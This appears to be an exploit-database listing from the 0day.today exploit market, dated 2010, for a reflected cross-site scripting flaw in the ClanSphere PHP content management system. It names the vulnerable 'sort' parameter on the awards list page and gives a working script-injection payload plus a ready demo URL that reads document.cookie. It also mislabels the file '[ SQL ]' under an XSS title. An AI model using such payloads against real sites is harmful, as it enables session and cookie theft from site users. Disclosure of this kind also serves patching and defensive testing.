[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClanSphere XSS Vulnerability

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12251
Category
web applications
Date add
15-05-2010
Platform
php
============================
ClanSphere XSS Vulnerability
============================

Script    : csphere http://www.csphere.eu/
   
Download  : http://www.csphere.eu/index/files
       
############################################################################   
         
[ Vulnerable File ] 
     
index.php?mod=awards&action=list&start=0&sort=3 [ SQL ] 
          
     
[ XpL ] 
       
"><script>alert(document.cookie)</script>
   
[ Demo] 
   
http://server/index.php?mod=awards&action=list&start=0&sort=3"><script>alert(document.cookie)</script>
 
 
###########################################################################################################



#  0day.today [2024-11-16]  #